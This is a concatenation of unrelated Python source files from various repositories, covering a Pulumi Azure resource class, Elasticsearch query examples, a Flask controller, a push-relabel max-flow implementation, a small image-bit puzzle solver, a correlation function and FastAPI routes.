def source_interaction_type(self) -> pulumi.Input[str]:
"""
Name of the source Interaction Type.
"""
return pulumi.get(self, "source_interaction_type")
@source_interaction_type.setter
def source_interaction_type(self, value: pulumi.Input[str]):
pulumi.set(self, "source_interaction_type", value)
@property
@pulumi.getter(name="targetProfileType")
def target_profile_type(self) -> pulumi.Input[str]:
"""
Name of the target Profile Type.
"""
return pulumi.get(self, "target_profile_type")
@target_profile_type.setter
def target_profile_type(self, value: pulumi.Input[str]):
pulumi.set(self, "target_profile_type", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Localized descriptions for the Link.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Localized display name for the Link.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="linkName")
def link_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the link.
"""
return pulumi.get(self, "link_name")
@link_name.setter
def link_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "link_name", value)
@property
@pulumi.getter
def mappings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]]:
"""
The set of properties mappings between the source and target Types.
"""
return pulumi.get(self, "mappings")
@mappings.setter
def mappings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TypePropertiesMappingArgs']]]]):
pulumi.set(self, "mappings", value)
@property
@pulumi.getter(name="operationType")
def operation_type(self) -> Optional[pulumi.Input['InstanceOperationType']]:
"""
Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
"""
return pulumi.get(self, "operation_type")
@operation_type.setter
def operation_type(self, value: Optional[pulumi.Input['InstanceOperationType']]):
pulumi.set(self, "operation_type", value)
@property
@pulumi.getter(name="referenceOnly")
def reference_only(self) -> Optional[pulumi.Input[bool]]:
"""
Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
return pulumi.get(self, "reference_only")
@reference_only.setter
def reference_only(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reference_only", value)
class Link(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
hub_name: Optional[pulumi.Input[str]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
participant_property_references: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]]] = None,
reference_only: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_interaction_type: Optional[pulumi.Input[str]] = None,
target_profile_type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
The link resource format.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] description: Localized descriptions for the Link.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] display_name: Localized display name for the Link.
:param pulumi.Input[str] hub_name: The name of the hub.
:param pulumi.Input[str] link_name: The name of the link.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]] mappings: The set of properties mappings between the source and target Types.
:param pulumi.Input['InstanceOperationType'] operation_type: Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]] participant_property_references: The properties that represent the participating profile.
:param pulumi.Input[bool] reference_only: Indicating whether the link is reference only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] source_interaction_type: Name of the source Interaction Type.
:param pulumi.Input[str] target_profile_type: Name of the target Profile Type.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LinkArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
The link resource format.
:param str resource_name: The name of the resource.
:param LinkArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LinkArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
display_name: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
hub_name: Optional[pulumi.Input[str]] = None,
link_name: Optional[pulumi.Input[str]] = None,
mappings: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TypePropertiesMappingArgs']]]]] = None,
operation_type: Optional[pulumi.Input['InstanceOperationType']] = None,
participant_property_references: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ParticipantPropertyReferenceArgs']]]]] = None,
reference_only: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
source_interaction_type: Optional[pulumi.Input[str]] = None,
target_profile_type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LinkArgs.__new__(LinkArgs)
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
if hub_name is None and not opts.urn:
raise TypeError("Missing required property 'hub_name'")
__props__.__dict__["hub_name"] = hub_name
__props__.__dict__["link_name"] = link_name
__props__.__dict__["mappings"] = mappings
__props__.__dict__["operation_type"] = operation_type
if participant_property_references is None and not opts.urn:
raise TypeError("Missing required property 'participant_property_references'")
__props__.__dict__["participant_property_references"] = participant_property_references
__props__.__dict__["reference_only"] = reference_only
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if source_interaction_type is None and not opts.urn:
raise TypeError("Missing required property 'source_interaction_type'")
__props__.__dict__["source_interaction_type"] = source_interaction_type
if target_profile_type is None and not opts.urn:
raise TypeError("Missing required property 'target_profile_type'")
__props__.__dict__["target_profile_type"] = target_profile_type
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["tenant_id"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:customerinsights/v20170101:Link"), pulumi.Alias(type_="azure-native:customerinsights:Link"), pulumi.Alias(type_="azure-nextgen:customerinsights:Link"), pulumi.Alias(type_="azure-native:customerinsights/v20170426:Link"), pulumi.Alias(type_="azure-nextgen:customerinsights/v20170426:Link")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Link, __self__).__init__(
'azure-native:customerinsights/v20170101:Link',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Link':
"""
Get an existing Link resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = LinkArgs.__new__(LinkArgs)
__props__.__dict__["description"] = None
__props__.__dict__["display_name"] = None
__props__.__dict__["link_name"] = None
__props__.__dict__["mappings"] = None
__props__.__dict__["name"] = None
__props__.__dict__["operation_type"] = None
__props__.__dict__["participant_property_references"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["reference_only"] = None
__props__.__dict__["source_interaction_type"] = None
__props__.__dict__["target_profile_type"] = None
__props__.__dict__["tenant_id"] = None
__props__.__dict__["type"] = None
return Link(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Localized descriptions for the Link.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Localized display name for the Link.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="linkName")
def link_name(self) -> pulumi.Output[str]:
"""
The link name.
"""
return pulumi.get(self, "link_name")
@property
@pulumi.getter
def mappings(self) -> pulumi.Output[Optional[Sequence['outputs.TypePropertiesMappingResponse']]]:
"""
The set of properties mappings between the source and target Types.
"""
return pulumi.get(self, "mappings")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="operationType")
def operation_type(self) -> pulumi.Output[Optional[str]]:
"""
Determines whether this link is supposed to create or delete instances if Link is NOT Reference Only.
"""
return pulumi.get(self, "operation_type")
@property
@pulumi.getter(name="participantPropertyReferences")
def participant_property_references(self) -> pulumi.Output[Sequence['outputs.ParticipantPropertyReferenceResponse']]:
"""
The properties that represent the participating profile.
"""
return pulumi.get(self, "participant_property_references")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="referenceOnly")
def reference_only(self) -> pulumi.Output[Optional[bool]]:
"""
        Indicates whether the link is a reference-only link. This flag is ignored if the Mappings are defined. If the mappings are not defined and it is set to true, links processing will not create or update profiles.
"""
return pulumi.get(self, "reference_only")
@property
@pulumi.getter(name="sourceInteractionType")
def source_interaction_type(self) -> pulumi.Output[str]:
"""
Name of the source Interaction Type.
"""
return pulumi.get(self, "source_interaction_type")
@property
@pulumi.getter(name="targetProfileType")
def target_profile_type(self) -> pulumi.Output[str]:
"""
Name of the target Profile Type.
"""
return pulumi.get(self, "target_profile_type")
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> pulumi.Output[str]:
"""
The hub name.
"""
return pulumi.get(self, "tenant_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
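The repeated `@property`/`@pulumi.getter(name=...)` pairs above map snake_case Python attributes onto camelCase wire properties backed by an internal property bag. A minimal stand-in sketching that mapping (`getter` and `LinkSketch` are hypothetical; this is not the real Pulumi API):

```python
def getter(name=None):
    """Stand-in for pulumi.getter: builds a property that reads the
    camelCase wire key (or the attribute name) from an internal dict."""
    def wrap(fn):
        key = name or fn.__name__
        def fget(self):
            return self._props.get(key)
        fget.__name__ = fn.__name__
        return property(fget)
    return wrap

class LinkSketch:
    def __init__(self, props):
        self._props = props

    @getter(name="displayName")
    def display_name(self):
        pass  # body unused; the decorator supplies the actual getter

    @getter()
    def description(self):
        pass

link = LinkSketch({"displayName": "My link", "description": "demo"})
print(link.display_name, link.description)
```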
dfece35aa41f364b2c33910decca79059fefe080 | 144 | py | Python | backend/python3/practice/loop_while.py | cmdlhz/study_for_ver2 | 2e5110d0ce80e70a163a132c9c9cbb0cd9f4f134 | ["MIT"]
age = 10
num = 0
while num < age:
if num == 0:
num += 1
continue
if num % 2 == 0:
print(num)
if num > 4:
break
    num += 1
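The same traversal can be sketched with a for-loop over `range`; collecting instead of printing makes the behaviour easy to check (the while version prints 2 and 4, then breaks once `num` exceeds 4):

```python
age = 10
seen = []
for num in range(1, age):  # starting at 1 replaces the initial continue branch
    if num % 2 == 0:
        seen.append(num)   # the while version prints here
    if num > 4:
        break
print(seen)  # [2, 4]
```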
5f097c38682586536a4136ac804db165e16d7bca | 9,630 | py | Python | _/elasticsearch-essentials-python-examples/chapter-6/relational_data_examples.py | paullewallencom/elasticsearch-978-1-7843-9101-0 | ff74cb7faafdf54c9d1ba828f74fea592898201f | ["Apache-2.0"]
__author__ = 'bharvi'
from elasticsearch import Elasticsearch
import json
#Creating Elasticsearch Client
es = Elasticsearch('localhost:9200')
def create_index_with_nested_mapping(index_name, doc_type):
'''
Function to create index with nested mapping
:param index_name: Name of the index to be created
:param doc_type: Name of document type to be created
'''
doc_mapping = {
"properties": {
"user": {
"type": "object",
"properties": {
"screen_name": {
"type": "string"
},
"followers_count": {
"type": "integer"
},
"created_at": {
"type": "date"
}
}
},
"tweets": {
"type": "nested",
"properties": {
"id": {
"type": "string"
},
"text": {
"type": "string"
},
"created_at": {
"type": "date"
}
}
}
}
}
body = dict()
mapping = dict()
mapping[doc_type] = doc_mapping
body['mappings'] = mapping
es.indices.create(index=index_name, body = body)
    print('index created successfully')
def index_nested_doc(index_name, doc_type):
document = {
"user": {
"screen_name": "d_bharvi",
"followers_count": "2000",
"created_at": "2012-06-05"
},
"tweets": [
{
"id": "121223221",
"text": "understanding nested relationships",
"created_at": "2015-09-05"
},
{
"id": "121223222",
"text": "NoSQL databases are awesome",
"created_at": "2015-06-05"
}
]
}
es.index(index=index_name, doc_type=doc_type, body=document, id=2333)
def find_nested_docs(index_name, doc_type, nested_field):
'''
Function for querying nested documents
:param index_name: Name of the index to be searched
:param doc_type: Name of document type to be searched
:param nested_field: path of the nested field ('tweets in our examples')
'''
query = {
"query": {
"nested": {
"path": nested_field,
"query": {
"bool": {
"must": [
{
"match": {
"tweets.text": "NoSQL"
}
},
{
"term": {
"tweets.created_at": "2015-09-05"
}
}
]
}
}
}
}
}
response = es.search(index=index_name, doc_type=doc_type, body=query)
for hit in response['hits']['hits']:
        print(json.dumps(hit.get('_source')))
def nested_aggregation(index_name, doc_type, nested_field):
'''
Function for performing nested aggregations
:param index_name: Name of the index to be searched
:param doc_type: Name of document type to be searched
:param nested_field: path of the nested field ('tweets in our examples')
'''
query = {
"aggs": {
"NESTED_DOCS": {
"nested": {
"path": nested_field
},"aggs": {
"TWEET_TIMELINE": {
"date_histogram": {
"field": "tweets.created_at",
"interval": "day"
}
}
}
}
}
}
response = es.search(index=index_name, doc_type=doc_type, body=query, search_type='count')
for bucket in response['aggregations']['NESTED_DOCS']['TWEET_TIMELINE']['buckets']:
        print(bucket['key'], bucket['key_as_string'], bucket['doc_count'])
def reverse_nested_aggregation(index_name, doc_type, nested_field):
'''
Function for performing reverse nested aggregations
:param index_name: Name of the index to be searched
:param doc_type: Name of document type to be searched
:param nested_field: path of the nested field ('tweets in our examples')
'''
query = {
"aggs": {
"NESTED_DOCS": {
"nested": {
"path": nested_field
},
"aggs": {
"TWEET_TIMELINE": {
"date_histogram": {
"field": "tweets.created_at",
"interval": "day"
},
"aggs": {
"USERS": {
"reverse_nested": {},
"aggs": {
"UNIQUE_USERS": {
"cardinality": {
"field": "user.screen_name"
}
}
}
}
}
}
}
}
}
}
response = es.search(index=index_name, doc_type=doc_type, body=query, search_type='count')
for bucket in response['aggregations']['NESTED_DOCS']['TWEET_TIMELINE']['buckets']:
        print(bucket['key'], bucket['key_as_string'], bucket['doc_count'])
        print(bucket['USERS']['UNIQUE_USERS']['value'])
        print(bucket['USERS']['doc_count'])
def create_index_with_parent_child_mapping(index_name, parent_type, child_type):
'''
Function to create index with nested mapping
:param index_name: Name of the index to be created
:param parent_type: Name of parent type to be created
:param child_type: Name of child_type type to be created
'''
child_doc_mapping = {
"_parent": {
"type": parent_type
},
"properties": {
"text":{"type": "string"},
"created_at":{"type": "date"}
}
}
body = dict()
mapping = dict()
mapping[child_type] = child_doc_mapping
body['mappings'] = mapping
es.indices.create(index=index_name, body = body)
parent_doc_mapping = {
"properties": {
"screen_name":{"type": "string"},
"created_at":{"type": "date"}
}
}
    # register the parent mapping directly (the intermediate body/mapping
    # dicts in the original were unused dead code)
    es.indices.put_mapping(index=index_name, doc_type=parent_type, body=parent_doc_mapping)
    print('index created successfully')
def index_parent_child_docs(index_name, parent_type, child_type):
'''
Function to index parent and child docs
:param index_name: Name of the index
:param parent_type: Name of parent type
:param child_type: Name of child_type type
'''
parent_doc = dict()
parent_doc['screen_name'] = 'd_bharvi'
    parent_doc['followers_count'] = 2000
    parent_doc['created_at'] = '2012-05-30'
child_doc = dict()
child_doc['text'] = 'learning parent-child concepts'
child_doc['created_at'] = '2015-10-30'
es.index(index=index_name, doc_type=parent_type, body=parent_doc, id='64995604')
es.index(index=index_name, doc_type=child_type, body=child_doc, id='2333', parent= '64995604')
def find_parent_by_child(index_name, parent_type, child_type):
'''
Example function for has_child query to return parent documents
:param index_name: Name of the index to be searched
:param parent_type: Name of parent type to be returned ('users in our examples')
:param child_type: Name of child type to be searched ('tweets in our examples')
'''
query = {
"query": {
"has_child": {
"type": child_type,
"query": {
"match": {
"text": "elasticsearch"
}
}
}
}
}
response = es.search(index=index_name, doc_type=parent_type, body=query)
for hit in response['hits']['hits']:
        print(json.dumps(hit.get('_source')))
def find_child_by_parent(index_name, parent_type, child_type):
'''
Example function for has_parent query to return child documents
:param index_name: Name of the index to be searched
:param parent_type: Name of parent type to be searched ('users in our examples')
:param child_type: Name of child type to be returned ('tweets in our examples')
'''
query = {
"query": {
"has_parent": {
"type": parent_type,
"query": {
"range": {
"followers_count": {
"gte": 200
}
}
}
}
}
}
response = es.search(index=index_name, doc_type=child_type, body=query)
for hit in response['hits']['hits']:
        print(json.dumps(hit.get('_source')))
if __name__ == "__main__":
create_index_with_nested_mapping('twitter_nested','users')
index_nested_doc('twitter_nested','users')
find_nested_docs('twitter_nested', 'users', 'tweets')
nested_aggregation('twitter_nested', 'users', 'tweets')
reverse_nested_aggregation('twitter_nested', 'users', 'tweets')
create_index_with_parent_child_mapping('twitter_parent_child','users', 'tweets')
index_parent_child_docs('twitter_parent_child','users', 'tweets')
find_parent_by_child('twitter_parent_child', 'users', 'tweets')
find_child_by_parent('twitter_parent_child', 'users', 'tweets')
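The query bodies in this file are plain dictionaries, so their shape can be exercised without a running cluster. A small sketch that rebuilds the nested query from `find_nested_docs` and inspects its structure (field names taken from the code above; no Elasticsearch connection involved):

```python
import json

def build_nested_query(nested_field, text, created_at):
    """Rebuild the nested bool query used by find_nested_docs above."""
    return {
        "query": {
            "nested": {
                "path": nested_field,
                "query": {
                    "bool": {
                        "must": [
                            {"match": {"tweets.text": text}},
                            {"term": {"tweets.created_at": created_at}},
                        ]
                    }
                }
            }
        }
    }

q = build_nested_query("tweets", "NoSQL", "2015-09-05")
print(json.dumps(q, indent=2))
```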
5f15b99e042bd43771e58506cde68e2ce5189fb4 | 153 | py | Python | src/essentials/io/print.py | ozanyldzgithuboffical/OzzyPythonSeriesPack | 5ba98449d8ab744db98ae038dc7a137edbaaff5d | ["MIT"]
# @Author: Ozan YILDIZ@2022
# Simple printing operation
val = 12
if __name__ == '__main__':
#print operation
print("Boolean True (True)", val)
5f1dd68567246b09750f7089819a42aeed2a93b5 | 1,727 | py | Python | src/controllers/thread.py | xoudini/tsoha | 39535ae851a4600089df2503961b6446e1f12253 | ["Apache-2.0"] | stars: 1 | issues: 1
from flask import render_template
from typing import Dict, List
from src.models.thread import Thread
from src.models.tag import Tag
class ThreadController:
### View rendering.
@staticmethod
def view_for_threads():
threads = Thread.find_all()
return render_template('threads.html', title="Threads", threads=threads)
@staticmethod
def view_for_thread(uid: int, messages: Dict[str, str] = None):
thread = Thread.find_by_id(uid)
return render_template('thread.html', title="Thread", thread=thread, messages=messages)
@staticmethod
def view_for_new_thread(messages: Dict[str, str] = None):
tags = Tag.find_all()
return render_template('new_thread.html', title="New thread", tags=tags, messages=messages)
@staticmethod
def view_for_edit_thread(uid: int, messages: Dict[str, str] = None):
thread = Thread.find_by_id(uid)
tags = Tag.find_all()
return render_template('edit_thread.html', title="Edit thread", thread=thread, tags=tags, messages=messages)
### Database updates.
@staticmethod
def create(user_id: int, title: str, content: str, tag_ids: List[int]):
result = Thread.create(user_id, title, content, tag_ids)
return result
@staticmethod
def update(uid: int, title: str, tag_ids: List[int]):
result = Thread.update(uid, title, tag_ids)
return result
@staticmethod
def delete(uid: int):
Thread.delete(uid)
### Helper methods.
@staticmethod
def thread_exists(uid: int):
return Thread.find_by_id(uid) is not None
@staticmethod
def author_for_thread(uid: int):
return Thread.author_for_thread(uid)
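The class above keeps every handler a `@staticmethod` that defers to the model layer. A minimal Flask-free sketch of that shape (`FakeThread` and `ControllerSketch` are hypothetical stand-ins, not the real model or controller):

```python
# The controller only orchestrates model calls and returns the result;
# all state lives behind the model interface.
class FakeThread:
    _rows = {1: {"id": 1, "title": "Hello"}}

    @staticmethod
    def find_by_id(uid):
        return FakeThread._rows.get(uid)

class ControllerSketch:
    @staticmethod
    def thread_exists(uid):
        return FakeThread.find_by_id(uid) is not None

print(ControllerSketch.thread_exists(1), ControllerSketch.thread_exists(2))
```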
a024701995b568e3c6e354e6a372130d13c65f5c | 948 | py | Python | src/Core/IssuerHandler.py | flexiooss/flexio-flow | 47491c7e5b49a02dc859028de0d486edc0014b26 | ["Apache-2.0"] | issues: 44
from typing import Optional
from Core.ConfigHandler import ConfigHandler
from FlexioFlow.Options import Options
from FlexioFlow.StateHandler import StateHandler
from VersionControlProvider.Issuer import Issuer
from VersionControlProvider.IssuerFactory import IssuerFactory
from VersionControlProvider.Issuers import Issuers
class IssuerHandler:
    def __init__(self, state_handler: StateHandler, config_handler: ConfigHandler, options: Options):
self.state_handler: StateHandler = state_handler
self.config_handler: ConfigHandler = config_handler
self.options: Options = options
def issuer(self) -> Optional[Issuer]:
issuers: Issuers = Issuers.GITHUB
issuer = None
try:
            issuer: Issuer = IssuerFactory.build(self.state_handler, self.config_handler, issuers, self.options)
except ValueError:
print('Can\'t get Issuer')
finally:
return issuer
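Note that `return issuer` inside the `finally` clause above means `issuer()` returns `None` even when the `try` block raises something other than `ValueError`: a `return` in `finally` discards the in-flight exception. A generic demonstration of that behaviour (`build_or_none` is a hypothetical stand-in, not tied to `IssuerFactory`):

```python
def build_or_none():
    issuer = None
    try:
        raise RuntimeError("factory blew up")  # stands in for an unexpected build failure
    except ValueError:
        print("Can't get Issuer")  # never runs for RuntimeError
    finally:
        return issuer  # returning from finally discards the in-flight RuntimeError

print(build_or_none())  # None
```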
a0268b071ea7f0de2f166e0ff7fd289453395a45 | 2,452 | py | Python | code/deprecated/push_relabel.py | campovski/bachelor | 36587a42bd95420fe030c5a903369c1b025c1ce0 | ["MIT"]
class Graph:
class Vertex:
def __init__(self, h, e):
self.h = h
self.e = e
class Edge:
def __init__(self, u, v, c, f):
self.u = u
self.v = v
self.c = c
self.f = f
def __init__(self, V):
self.vertices = [self.Vertex(0, 0) for _ in range(V)]
self.edges = []
def max_flow(self):
self.init_preflow()
while self.get_overflowing_vertex() != -1:
u = self.get_overflowing_vertex()
if not self.push(u):
self.relabel(u)
return self.vertices[len(self.vertices)-1].e
def init_preflow(self):
self.vertices[0].h = len(self.vertices)
for i in range(len(self.edges)):
if self.edges[i].u == 0:
self.edges[i].f = self.edges[i].c
self.vertices[self.edges[i].v].e = self.edges[i].f
#self.add_edge(self.edges[i].v, 0, 0, -self.edges[i].f)
self.update_reverse_edge(i, self.edges[i].f)
def push(self, u):
for i in range(len(self.edges)):
if self.edges[i].u == u and self.edges[i].f < self.edges[i].c\
and self.vertices[u].h > self.vertices[self.edges[i].v].h:
delta = min(self.vertices[u].e, self.edges[i].c - self.edges[i].f)
self.vertices[u].e -= delta
self.vertices[self.edges[i].v].e += delta
self.edges[i].f += delta
self.update_reverse_edge(i, delta)
return 1
return 0
def relabel(self, u):
        min_height_adj = float("inf")  # sys.maxint does not exist in Python 3
for i in range(len(self.edges)):
if self.edges[i].u == u and self.edges[i].f < self.edges[i].c and \
self.vertices[self.edges[i].v].h < min_height_adj:
min_height_adj = self.vertices[self.edges[i].v].h
        self.vertices[u].h = min_height_adj + 1
def get_overflowing_vertex(self):
for u in range(1, len(self.vertices)-1):
if self.vertices[u].e > 0:
return u
return -1
def update_reverse_edge(self, i, delta):
for j in range(len(self.edges)):
if self.edges[i].u == self.edges[j].v and self.edges[i].v == self.edges[j].u:
self.edges[j].f -= delta
return
self.add_edge(self.edges[i].v, self.edges[i].u, 0, -delta)
def add_edge(self, u, v, c, f):
self.edges.append(self.Edge(u, v, c, f))
def populate_graph():
    V = int(input())
graph = Graph(V)
while True:
try:
            u, v, c = input().split()
graph.add_edge(int(u), int(v), int(c), 0)
except EOFError:
break
return graph
if __name__ == '__main__':
import sys
graph = populate_graph()
    print("Maximum flow through given network is {0}.".format(graph.max_flow()))
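The class above reads the network from stdin, which makes it awkward to try interactively. As a cross-check on the same quantity, a compact Edmonds–Karp implementation (BFS augmenting paths — a different max-flow algorithm than push-relabel, but it computes the same value) on a small hand-made network:

```python
from collections import defaultdict, deque

def edmonds_karp(edges, s, t):
    """Max flow via shortest augmenting paths; edges is a list of (u, v, capacity)."""
    cap = defaultdict(int)
    adj = defaultdict(set)
    for u, v, c in edges:
        cap[(u, v)] += c
        adj[u].add(v)
        adj[v].add(u)  # residual arc
    flow = 0
    while True:
        parent = {s: None}
        queue = deque([s])
        while queue and t not in parent:
            u = queue.popleft()
            for v in adj[u]:
                if v not in parent and cap[(u, v)] > 0:
                    parent[v] = u
                    queue.append(v)
        if t not in parent:
            return flow
        # bottleneck along the found path
        delta, v = float("inf"), t
        while parent[v] is not None:
            delta = min(delta, cap[(parent[v], v)])
            v = parent[v]
        v = t
        while parent[v] is not None:
            cap[(parent[v], v)] -= delta
            cap[(v, parent[v])] += delta
            v = parent[v]
        flow += delta

# source 0, sink 3; the cut {0} has capacity 3 + 2 = 5
network = [(0, 1, 3), (0, 2, 2), (1, 2, 1), (1, 3, 2), (2, 3, 3)]
print(edmonds_karp(network, 0, 3))  # 5
```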
a02e0a082de3fbb3c2ed2d36ddef397fafd72c56 | 317 | py | Python | Luke 03/03.py | Nilzone-/Knowit-Julekalender-2017 | 66ef8a651277e0fef7d9278f3f129410b5b98ee0 | ["MIT"]
from bitarray import bitarray
from PIL import Image
image = Image.open('knowit_03.png')
red, *_ = image.split()
bits = [x & 1 for x in red.tobytes()]
#byte_string, *_ = bitarray(bits, endian='little').tobytes().partition(b'\0')
#result = byte_string.decode('ascii')
print(bitarray(bits, endian='little').tobytes())
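The trick above reads the least significant bit of each red-channel byte and packs the bits little-endian into ASCII. The same round trip on synthetic pixel values (no image, PIL, or bitarray needed; the little-endian bit order matches the script above):

```python
message = "Hi"
# embed: one message bit (little-endian within each byte) into the LSB of a fake red value
bits = [(byte >> i) & 1 for byte in message.encode("ascii") for i in range(8)]
reds = [200 + b for b in bits]  # 200 is an arbitrary even base pixel value

# extract: mirrors `x & 1 for x in red.tobytes()`, then repack little-endian
lsbs = [r & 1 for r in reds]
decoded = bytes(
    sum(bit << i for i, bit in enumerate(lsbs[k:k + 8]))
    for k in range(0, len(lsbs), 8)
).decode("ascii")
print(decoded)  # Hi
```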
a0335023fe1f244d748c1159f41b888a2ca0ca0a | 1,006 | py | Python | Statistics/Population_corelation_coefficient.py | rar9898/StatisticalCalculator | 34ffd7e9e60facd5cce7af3e43ceb244f741138b | ["MIT"]
from Statistics.ZScore import zscore
from Statistics.Mean import mean
from Statistics.StandardDeviation import standard_deviation
from Calculator.Subtraction import subtraction
from Calculator.Division import division
from Calculator.Multiplication import multiplication
from Calculator.Addition import addition
def population_correlation_coefficient(numbers, numbers1):
m = zscore(numbers)
n = zscore(numbers1)
value = list(map(lambda a, b: a * b, m, n))
p = division(len(value), sum(value))
return p
"""
x = mean(numbers)
y = mean(numbers1)
m = []
n = []
t = 0
for i in numbers:
zn = division(standard_deviation(numbers), subtraction(x, i))
m.append(zn)
for i in numbers1:
zm = division(standard_deviation(numbers1), subtraction(y, i))
n.append(zm)
for i in range(len(numbers)):
jk = multiplication(m[i], n[i])
t = addition(t, jk)
res = division(subtraction(1, len(numbers), t))
return res
    """
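Pearson's r is the mean product of the two z-score series, which is what the live code above computes (modulo the argument order of the custom `division` helper). A dependency-free sketch for comparison, using the population standard deviation as the module names suggest:

```python
import math

def pearson_r(xs, ys):
    """Population Pearson correlation coefficient."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sx = math.sqrt(sum((x - mx) ** 2 for x in xs) / n)
    sy = math.sqrt(sum((y - my) ** 2 for y in ys) / n)
    return sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / (n * sx * sy)

print(pearson_r([1, 2, 3, 4], [2, 4, 6, 8]))  # perfectly linear data -> r = 1
```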
a04b8036c2e618fe8ab0e227a7e9e5bace8accf3 | 806 | py | Python | src/controller/locationRoutes.py | Bocampagni/Shipping-api | 4cdf074467e4478885fe55d7c82a16e1a577b045 | ["MIT"]
"""
Routes here:
- Where am I ?
- Return the street, city and country a given geolocation point is at.
- Linear distance (Haversine)
- Return the linear distance on a globe given two geo-coordinates.
"""
from fastapi import APIRouter
from src.service.HaversineService import linear_distance
from src.model.linearDistance import linearDistance
from src.model.pairCoordinate import pairCoordinate
from src.service.whereAmIService import getLocation
router = APIRouter()
@router.post("/linearDistance")
def get_linear_distance(distance: linearDistance):
result_in_kilometers = linear_distance(distance)
return {"Kilometers": result_in_kilometers}
